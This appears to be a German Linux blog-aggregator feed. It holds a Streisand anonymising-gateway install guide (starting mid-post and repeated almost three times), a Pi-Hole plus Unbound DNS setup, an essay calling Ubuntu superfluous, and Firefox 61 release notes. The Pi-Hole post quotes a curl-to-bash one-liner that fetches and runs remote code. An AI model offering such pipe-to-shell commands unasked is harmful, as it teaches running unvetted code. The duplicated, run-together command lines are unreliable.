Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let's Encrypt nutzen wollt - was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Informationen zum Streisand Zugang

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. :)

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

alt

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist – leider noch – ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss – sofern noch nicht vorhanden – mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt updateapt-get install git python-pipgit clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let’s Encrypt nutzen wollt – was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

alt

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. ?

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist – leider noch – ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss – sofern noch nicht vorhanden – mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt updateapt-get install git python-pipgit clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let’s Encrypt nutzen wollt – was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. 🙂

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

Der Beitrag STREISAND – Automatisierter Gateway-Server zum anonymen surfen erschien zuerst auf timscha.io.

3. Juli 2018

Pi-Hole ist ein sogenanntes “DNS-Sinkhole” für das eigene Netzwerk mit dem man unerwünschte Werbung von Webseiten herausfiltern kann. Gestern habe ich mir das ganze auf einem freigewordenen Raspberry Pi installiert.

Da Pi-Hole Arch Linux offiziell nicht unterstützt und es wohl ab und zu zu Problemen kommt, habe ich mir kurzerhand Raspbian installiert. Lustigerweise gibt es für Arch im AUR ein Paket für Pi-Hole während man hingegen bei Rasppian das ganze über “curl -sSL https://install.pi-hole.net | bash” installieren muss. Das ist übrigens der offizielle Weg, auch wenn normalerweise vor solchen Anleitungen gewarnt wird. Der ganze Vorgang ist unterm Strich recht unspektakulär und funktioniert unterm Strich einfach.

Während der Installation ist mir die Idee gekommen, ob man nicht Pi-Hole mit Unbound kombinieren kann. Unbound lief bei mir bisher als caching DNS Resolver, so dass ich nicht auf DNS wie 8.8.8.8 (Google) angewiesen bin.

Also erst einmal Unbound mittels “sudo apt install unbound” installieren.

Mit dem Befehl “sudo wget -O /var/lib/unbound/root.hints https://www.internic.net/domain/named.root" laden wir uns nun die Liste der DNS-Root-Server herunter.

Jetzt geht es an das Konfigurieren von Unbound. Hierfür legen wir die Datei /etc/unbound/unbound.conf.d/pi-hole.conf an und füllen sie folgendem Inhalt.

server:
    verbosity: 1
    port: 12345
    do-ip4: yes
    do-udp: yes
    do-tcp: yes

    # Wenn IPv6 genutzt wird auf yes ändern
    do-ip6: no

    # Liste der Root-Server
    root-hints: "/var/lib/unbound/root.hints"

    # Vertraut glue nur wenn innerhalb von servers authority
    harden-glue: yes

    # Um DNSSEC zu deaktivieren auf no setzen
    harden-dnssec-stripped: yes

    # Großbuchstaben um Spoof zu erschweren
    use-caps-for-id: yes
    
    # EDNS Buffergroeße
    edns-buffer-size: 1472

    # TTL für Cache
    cache-min-ttl: 3600
    cache-max-ttl: 86400

    # Oft genutzte Einträge bleiben im Cache
    prefetch: yes

    # Anzahl der Threads (1 reicht fuer kleines LAN)
    num-threads: 1
    
    # Cache-Speicher. rrset sollte doppelt so groß wie msg sein
    msg-cache-size: 50m
    rrset-cache-size: 100m
    
    # UDP schneller mit Multithreading (Tux only).
    so-reuseport: yes
    
    # Stellt sicher, dass Kernel-Buffer groß genug ist wenn Traffic stark ansteigt 
    so-rcvbuf: 1m

    # IP werden nicht aufgelöst
    private-address: 192.168.1.1/16
    

Wer mit meinen Kommentaren nichts anfangen kann, kann unter https://www.unbound.net/documentation/unbound.conf.html eine genauere Beschreibung nachlesen. Im Moment ist nur die dritte und die letzte Zeile wichtig. In der dritten wird der Port angegeben auf den Unbound lauschen soll. Und in der letzten trägt man seinen Adressbereich für das eigene LAN ein.

Mittels “systemctl start unbound.service” testet man nun, ob Unbound ohne Probleme startet. Mit “systemctl enable unbound.service” wird Unbound automatisch gestartet

Jetzt noch Unbound bei Pi-Hole als DNS eintragen. Hierfür einfach $PI-IP/admin im Browser eingeben (anstelle von $IP-IP nimmt man die IP unter der der Raspberry im LAN erreichbar ist). Nun sollte das Dashboard von Pi-Hole angezeigt werden. Dort klicken wir dann links auf Login und melden uns an. Nun wählen wir links Settings -> DNS aus. Hier habe ich festgestellt, dass man in der stabilen Version von Pi-Hole zwar die IP eines eigenen DNS eintragen kann, aber keinen Port. Nach etwas Google-Fu habe ich herausgefunden, dass die erst mit der aktuellen Beta-Version funktioniert. Da ich nichts zu verlieren habe, bin ich mit folgenden Befehlen auf die aktuelle Beta-Version gewechselt.

echo "FTLDNS" | sudo tee /etc/pihole/ftlbranch
pihole checkout core FTLDNS 
pihole checkout web FTLDNS

Nun lässt sich unter Settings -> DNS 127.0.0.1#12345 eintragen (anstelle von 12345 nimmt man den in der Konfigurationsdatei angegebenen Port (# ist hier Absicht und muss angegeben werden).

Nun müssen wir nun noch den Geräten im Netzwerk beibringen, das Pi-Hole als DNS zu nutzen. Hierzu hinterlegen wir die IP des Raspberry Pi entweder im Router oder passen die DNS-Einstellungen auf den jeweiligen Geräten an (/etc/resolv.conf, netctl Profile usw.).

Als Fazit nach ca. 24 Stunden mit der Kombination aus Pi-Hole und Unbound kann ich bisher folgende Aussagen treffen:

  • Apt ist verglichen mit pacman verflucht langsam
  • Ich werde mich nie mit einer Distribution anfreunden die für jeden Mist sudo nutzt, so dass ich vermutlich das Root-Konto aktivieren oder doch wieder Arch installieren werde.
  • Wenn Unbound die IP einer Internetseite noch nicht kennt, gibt es eine knappe Gedenksekunde bis die Seite angezeigt wird. Danach geht alles sehr schnell.
  • Wenn man sich die Statistik von Pi-Hole so ansieht, merkt man erst wie viel Mist gefiltert wird. Bei mir sind es aktuell 30,4 Prozent aller Anfragen die im Loch verschwinden.

Was die Statistik betrifft, habe ich gemerkt, dass diese jede Minute aktualisiert wird. Da ich keine aktuellen Statistiken benötige und um daher unnötige Schreibvorgänge auf der Speicherkarte zu vermeiden habe ich die Datei /etc/pihole/pihole-FTL.conf angelegt und dort DBINTERVAL=60.0 eingetragen. Somit erfolgt der Schreibvorgang nun noch alle 60 Minuten. Für mich absolut ausreichend, da zwischenzeitlich der Filtervorgang ganz normal weiterläuft.

Einen Nachteil hat diese Lösung für mich aber. Für diverse Sachen wie Geo-Blocking nutze ich einen VPN-Anbieter. Beim derzeitigen Anbieter (was vermutlich auch auf die meisten anderen Anbieter zutreffen wird) lässt sich leider kein eigener DNS eintragen um sogenannte DNS Leaks zu verhindern. Somit werde ich auch weiterhin im Browser zusätzlich uBlock Origin nutzen. Zumal Pi-Hole manche Sachen wie diese nervigen Cookie-Hinweise nicht filtern kann.

Ubuntu ist überflüssig! Bedingt durch den eigenen Erfolg und mangels Ideen und Engagement braucht man es eigentlich nicht mehr. Die hohen Marktanteile im Linux-Segment beruhen auf der verbreiteten Gleichsetzung Linux=Ubuntu und sichern aktuell noch die Verbreitung. Sich darauf auszuruhen ist gefährlich, der Linux Mint-Hype hat gezeigt, dass sich Marktanteile schnell verschieben können.

So überflüssig Ubuntu heute ist, so wenig trifft dies auf die Vergangenheit zu. Als Ubuntu 2004 die erste Version herausbrachte war Linux auf dem Desktop ein Elend. Die Installationsroutinen der Distributionen waren kompliziert und anschließend war massive Nacharbeit durch den Anwender notwendig, bis alles einigermaßen lief. Proprietäre Treiber für Grafikkarten, WLAN-Adapter und ähnliches waren kompliziert zu installieren und hatten das Potenzial Updates und Upgrades zu einem Glücksspiel zu machen. Manuelle Konfiguration der wichtigen Config-Dateien war nicht optional sondern Grundvoraussetzung.

Die Bedeutung von Ubuntu kann man sehr gut ermessen, wenn man mal openSUSE 10.2 mit Ubuntu Dapper Drake - der ersten LTS-Version - vergleicht. Von vergleichbaren Debian-Versionen ganz zu schweigen, man hatte schließlich erst mit Etch im Jahr 2007 ein richtiges Installationsprogramm. Was die Einfachheit der Installation und die anschließende Einrichtung betrifft lagen zwischen Ubuntu und dem Rest des Linux-Ökosystems Welten.

Innovativ war nicht nur die deutlich vereinfachte Installationsroutine und die LiveCD, die einen Vorabtest der Hardwarekompatiblität ermöglichte, sondern auch die gute Vorkonfiguration des Desktops und die ausgesuchte Programmauswahl. Neu war zudem auch die Idee eines festgelegten Supportzeitraumes und die Ausdehnung eines Enterprise-Supports auf den Desktop, sowie dessen Verfügbarkeit für Privatanwender.

Ubuntu hatte immer zahlreiche Schwachpunkte. Das schlecht gepflegte Universe, die Abhängigkeit von Canonical, die teilweise intransparente Entscheidungsfindung durch Mark Shuttleworth, das schwierige Verhältnis zur Open Source-Community - um nur einige zu nennen. Demgegenüber standen aber immer die immensen Vorteile auf dem Desktop gegenüber den alten Distributionen, die erst angespornt durch den Konkurrenzdruck und das Vorbild Ubuntus ein wenig Feinschliff vornahmen.

Der Vergleich mit Dapper Drake zeigt aber bereits die Problematik. Nachdem man die - nennen wir sie mal - Kerninnovationen umgesetzt hatte konzentrierte man sich auf den Feinschliff. Neuheiten waren doch eher kleinerer Natur und beschränkten sich oft auf die Übernahme der aktuellen Entwicklungen der Open Source-Gemeinschaft. Dieser Idee blieb man im Grunde genommen auch treu, als man Unity aus der Taufe hob. Die Ubuntu-Entwickler glaubten zu dem Zeitpunkt nicht, dass die GNOME Shell in der Form ein Erfolg sein würde - vollkommen richtig, wie sich dann herausgestellt hat.

Nachdem man fast alle Eigenentwicklungen beerdigt hat, ist man mit 18.04 zur GNOME Shell zurück gekehrt. Lieblos hat man versucht das Ubuntu Design zu übertragen, aber alles wirkt zusammen geflickt und eine Aktualisierung der Designsprache an gegenwärtige Design-Ideale steht weiterhin aus. Irgendwie glaubt man einen Software-Store haben zu müssen, aber auch dieser ist lieblos und dysfunktional. Die schlechte Integration der Snaps setzt dem nur die Krone auf.

Die Ubuntu-Entwickler scheinen jede Vision für den Desktop verloren zu haben. Rein oberflächlich ignoriert man die Tendenzen der Gegenwart, indem beispielsweise Cloud keine Rolle spielt und die Integration mit Android nicht vorkommt - für beides gibt es vitale Communityprojekte. Früher hätte Ubuntu so etwas integriert und leicht verfügbar gemacht. Dabei geht es nicht nur um die Oberfläche, sondern auch um Erleichterungen für den Privatanwender. Ein Gebiet auf dem Ubuntu früher immer geglänzt hat. Ein weiteres Beispiel für eine solche Innovation hat openSUSE in der Vergangenheit mit der Btrfs-Snapper Kombination entwickelt und die Linux-Mint Macher sind nun mit Timeshift auf diesen Zug aufgesprungen. Die Erkenntnis dahinter ist, dass Updates scheitern können und der Privatanwender dann meist überfordert ist. Leicht rückabwickelbare Schnappschüsse sollen dann helfen.

Bei Ubuntu gibt es Neuerungen nur noch mit Hinblick auf den Serverbereich. Hier gab es eine neue Installationsroutine und mit ZFS ein Experiment mit Zukunftschancen.

Wozu braucht man Ubuntu noch auf dem Desktop? Nichts von dem gebotenen, bekommt der Anwender nicht auch bei z. B. Debian. Das liegt natürlich auch daran, dass Debian und andere - vergleichsweise alte - Distributionen aufgeholt haben was Nutzerfreundlichkeit & Co betrifft. Der Fluch eines Avantgardeprojektes besteht halt darin, dass man nicht nur innovativ gewesen sein, sondern fortwährend innovativ bleiben muss. Ubuntu ist heute ein genau so lieblos zusammen geschusterter Baukasten wie Debian - mit dem Unterschied, dass es ohne die von Debian geerbten Pakete nicht mal das wäre.

Ubuntu ist also überflüssig.


Bilder:

Einleitungs- und Beitragsbild von JESHOOTScom via pixabay / Lizenz: CC0 Creative Commons

"

1. Juli 2018

Mozilla hat Firefox 61 veröffentlicht. Auch Firefox 61 bringt wieder viele Neuerungen. Dieser Artikel fast die wichtigsten Neuerungen zusammen.

Download Mozilla Firefox 61.0 für Microsoft Windows, Apple macOS und Linux

Mehr Sicherheit für Firefox-Nutzer

Geschlossene Sicherheitslücken

Auch in Firefox 61 hat Mozilla wieder zahlreiche Sicherheitslücken geschlossen, worunter auch einige sind, welche von Mozilla als besonders kritisch eingestuft werden. Alleine aus Gründen der Sicherheit ist ein Update auf Firefox 61 daher für alle Nutzer dringend empfohlen.

TLS 1.3 standardmäßig aktiviert

Transport Layer Security (TLS), vielen besser bekannt unter dem alten Namen Secure Sockets Layer (SSL), bezeichnet ein Verschlüsselungsprotokoll für sichere Datenübertragung im Internet. Mit Firefox 61 ist der neueste Entwurf von TLS 1.3 nun für alle Nutzer stardmäßig aktiviert.

Keine FTP-Sub-Ressourcen auf HTTP(S)-Webseiten mehr

Firefox lädt nicht länger FTP-Sub-Ressourcen auf HTTP- oder HTTPS-Webseiten. Bei FTP handelt es sich um ein unsicheres Protokoll, dessen Verwendung im Browser als deprecated gilt und langfristig komplett entfernt werden wird.

Tipp: Eine neue Einstellung seit Firefox 60 erlaubt das vollständige Deaktivieren des FTP-Protokolls.

Mehr Geschwindigkeit für Firefox-Nutzer

Mit der Veröffentlichung von Firefox 57 im November 2017 hat Mozilla die Performance seines Browsers signifikant verbessert. Doch ruht sich Mozilla seit dem nicht aus und arbeitet kontinuierlich an weiteren Verbesserungen der Geschwindigkeit. Auch Firefox 61 bringt diesbezüglich wieder verschiedene Verbesserungen.

Retained Display Lists

Das Display List Building bezeichnet den Prozess, in welchem die Elemente wie Ränder, Hintergründe usw. gesammelt werden, welche auf dem Bildschirm angezeigt werden sollen und dann gemäß der CSS Painting-Regeln sortiert werden. Bislang musste die sogenannte Display List jedes Mal neu berechnet werden, wenn eine Änderung der Anzeige erfolgte. Dieser Vorgang kann langsam sein, insbesondere mit den immer komplexer werdenden Webseiten sowie den immer größeren Bildschirmen, welche von den Nutzern eingesetzt werden. Retained Display Lists ermöglichen es, dass nur die Teile neu berechnet werden müssen, die sich auch tatsächlich geändert haben. In einem Test konnte die Häufigkeit langsamer Ausführungen um 30 Prozent reduziert werden. Mit Firefox 61 beginnt Mozilla mit der Auslieferung der Verbesserung, zunächst für einen Teil der Nutzer und im Laufe der kommenden Wochen schließlich für alle Nutzer.

Paralleles CSS-Parsing

Mit Firefox 57 hat Mozilla Quantum CSS, auch Stylo genannt, eingeführt. Dabei handelt es sich um eine in Rust geschriebene CSS-Engine aus Mozillas Forschungsprojekt Servo. Stylo nutzt für die Verarbeitung von CSS mehrere Prozessorkerne – etwas, was bislang keine andere Browser-Engine auf dem Markt kann. Mit Firefox 61 hat Mozilla nun auch den Parsing-Schritt parallelisiert.

Windows, Linux: Schnelleres Wechseln von Tabs

Auch die Geschwindigkeit des Tab-Wechsels wurde durch sogenanntes Tab Warming verbessert, in Firefox 61 zunächst für Nutzer von Windows und Linux. Das „Aufwärmen“ verbessert durch Vorbereitungen die gefühlte Performance , wenn der Benutzer die Maus über einen Tab bewegt und damit ein wahrscheinliches Interesse signalisiert, diesen Tab öffnen zu wollen.

Auf Apple macOS gibt es noch Probleme mit der Implementierung, weswegen eine Aktivierung dieser Verbesserung zurückgehalten wird, bis auch hier die Qualität stimmt.

Apple macOS: WebExtensions in einem eigenen Prozess

Die Multiprozess-Architektur von Firefox verbessert Stabilität, Reaktionsfreudigkeit sowie Sicherheit von Firefox, indem Browser und Content in separaten Prozessen ausgeführt werden. Neben dem Browser- und mehreren Content-Prozessen gibt es auch noch eigene Prozesse unter anderem für den Zugriff auf lokale Dateien oder für die Grafikkarte.

Nachdem auf Windows bereits seit Firefox 56 auch WebExtensions in einem eigenen Prozess ausgeführt werden, trifft dies nun auch auf Apple macOS zu. Auf Linux ist der zusätzliche WebExtension-Prozess derzeit für Firefox 63 geplant.

Sonstige Performance-Verbesserungen

Verbessert wurde auch die gefühlte Geschwindigkeit des Wechsels zwischen zwei Themes. Für minimale Performance-Verbesserungen auf Windows sorgt außerdem ein Update des Compilers auf Visual Studio 2017 15.6. Auch die Geschwindigkeit der WebExtensions-API, um einen bestimmten Tab auszuwählen, konnte verbessert werden. In einem Test zur Auswahl des aktiven Tabs mit knapp 1.900 offenen Tabs konnte hier die Zeit von ca. 4.000ms auf 370ms reduziert werden. Auch die Performance des CSS-Standards Flexbox konnte signifikant verbessert werden. Ein Extremfall einer Webseite, die zuvor in 185 Sekunden noch immer nicht geladen war, lädt nun in weniger als zehn Sekunden. Weiterhin konnte die CPU-Auslastung unter bestimmten Bedingungen reduziert werden.

Einfacher gemacht: Neue Suchmaschinen hinzufügen

Firefox wird bereits mit einigen Suchmaschinen standardmäßig ausgeliefert. Viele Webseiten, darunter auch dieser Blog, liefern eigene Suchfunktionen aus, welche vom Benutzer zu Firefox hinzugefügt werden können. Während Nutzer mit separater Suchleiste über diese bereits in der Vergangenheit Suchmaschinen hinzufügen konnten, besteht diese Möglichkeit ab sofort auch für Nutzer ohne separate Suchleiste. Eine entsprechende Option befindet sich in dem Menü mit den drei Punkten in der Adressleiste.

Firefox 61

Tipp: Wer diesen Menüeintrag per Kontextmenü zur Adressleiste hinzufügt, sieht auch ohne Auswahl dieses Menüs immer sofort in der Adressleiste, wenn eine Webseite eine eigene Suchmaschine anbietet.

Apple macOS: Einfacheres Teilen von Webseiten

Wer Apple macOS als Betriebssystem einsetzt, kann nun das Symbol mit den drei Punkten in der Adressleiste klicken und erhält darüber Zugriff auf eine Teilen-Funktion, welche es erlaubt, die aktuelle Seite über andere Dienste wie Facebook, Twitter, Messages, E-Mail, AirDrop oder weitere zu teilen. Dazu bedient sich Firefox an der entsprechenden Sharing-Schnittstelle, welche das Apple-Betriebssystem bereitstellt. Anwendungen, welche sich in das native Sharing von macOS integrieren, steht damit automatisch über dieses Menü in Firefox zur Verfügung.

Firefox 61

Dunkles Theme wird vollständig dunkel

Firefox wird im Standard-Auslieferungszustand neben seinem Standard-Design auch noch mit einem alternativen hellen sowie dunklen Theme ausgeliefert. Das dunkle Theme wird mit Firefox 61 vollständig dunkel. Das heißt, dass nicht länger nur die Tab- und Symbolleisten einschließlich der Symbole dunkel gefärbt werden, sondern auch die Adressleisten-Vorschläge, die Seite, welche beim Öffnen eines neuen Tabs erscheint, das Hauptmenü, sämtliche Panels von Firefox sowie die Seite zum Anpassen der Firefox-Oberfläche.

Firefox 61

Verbesserte Firefox-Startseite / neuer Tab

Neue Einstellungsoberfläche

Die Einstellungen zum Anpassen der Firefox-Startseite, welche standardmäßig auch beim Öffnen eines neuen Tabs erscheint, wurden in die Haupt-Einstellungsoberfläche von Firefox verschoben. Dort gibt es nun einen eigenen Reiter für die Firefox-Startseite.

Auch lässt sich in den neuen Einstellungen das Verhalten für die Startseite und die Seite, die beim Öffnen eines neuen Tabs erscheint, separat, aber an einem gemeinsamen Ort konfigurieren. Auch die Auswahl einer komplett leeren Seite, also auch ohne Zahnrad-Symbol für das Öffnen der Einstellungen, als neuer Tab ist hierüber nun möglich, ohne eine Einstellung in about:config ändern oder eine Erweiterung installieren zu müssen.

Firefox 61

Entsprechend wurde der Abschnitt zur Konfiguration der Startseite aus dem Bereich „Allgemein“ entfernt, wo sich jetzt die Option befindet, beim Start von Firefox die vorherige Browser-Sitzung wiederherzustellen. Dies war vorher in die Startseiten-Einstellung integriert.

Firefox 61

Der Bereich „Überblick“ auf der Firefox-Startseite beinhaltet eine Auswahl von Webseiten, welche kürzlich besucht oder als Lesezeichen gespeichert worden sind. Seit Firefox 60 werden hier auch Webseiten angezeigt, die der Nutzer über die entsprechende Schaltfläche in Firefox bei Pocket abgelegt hat, einem Online-Dienst von Mozilla. Mit Firefox 61 kommen heruntergeladene Dateien als weitere Kategorie dazu. Alle diese Kategorien können nun einzeln aktiviert respektive deaktiviert werden, womit der Nutzer noch mehr Kontrolle als eh schon über die Firefox-Startseite hat.

Tracking-Schutz für Vorschaubilder

Die Vorschaubilder, welche Firefox für die Firefox-Startseite generiert, holt sich Firefox nun grundsätzlich mit aktiviertem Tracking-Schutz, unabhängig davon, ob dieser für das allgemeine Surfen aktiviert ist oder nicht. Neben einer verbesserten Privatsphäre resultiert dies in einer verbesserten Geschwindigkeit für die Generierung der Bilder und für manche Seiten außerdem in besseren Vorschaubildern.

Individuelle Vorschaubilder

Wem auf der Firefox-Startseite im Abschnitt „Wichtige Seiten“ die Vorschaubilder nicht zusagen, kann ab Firefox 61 ganz einfach sein eigenes Bild festlegen.

Firefox 61

Verbesserte Synchronisation von Lesezeichen

Die Sychronisation von Lesezeichen ist einer der komplexesten und wichtigsten Teile der Firefox-Synchronisation, darum hat sich Mozilla in den vergangenen zwei Jahren intensiv mit der Lesezeichen-Synchronisation beschäftigt. Nachdem Mozilla die Synchronisation für die iOS-Version von Firefox komplett neu entwickelt hatte, erhält das dort bewährte Konzept zur Synchronisation nun auch in abgewandelter Form Einzug im Desktop-Firefox. Wer sich für die technischen Details interessiert, findet auf dem Mozilla-Blog eine ausführliche Beschreibung zur Funktionsweise. Durch die verbesserte Lesezeichen-Synchronisation sollen Probleme, von denen manche Nutzer in der Vergangenheit betroffen waren, wie verlorene Lesezeichen, doppelte Lesezeichen oder eine geänderte Lesezeichen-Reihenfolge, der Vergangenheit angehören. Diese Änderung wird schrittweise zunächst nur für einen Teil der Firefox-Nutzer eingeführt.

Verbesserungen für Entwickler von Firefox-Erweiterungen

Natürlich gab es auch für Entwickler von WebExtensions wieder einige neue APIs und Verbesserungen bestehender APIs. Eine Neuerung mit viel Potential für Tab- und Tab-Gruppen-Erweiterungen ist die Möglichkeit, Tabs zu verstecken. Sobald eine Erweiterung Tabs versteckt, bleiben versteckte Tabs weiterhin über das Pfeil-Symbol in der Tab-Leiste zugänglich. Spielt ein versteckter Tab Audio ab, erscheint ein Lautsprecher-Symbol auf dem Pfeil-Symbol.

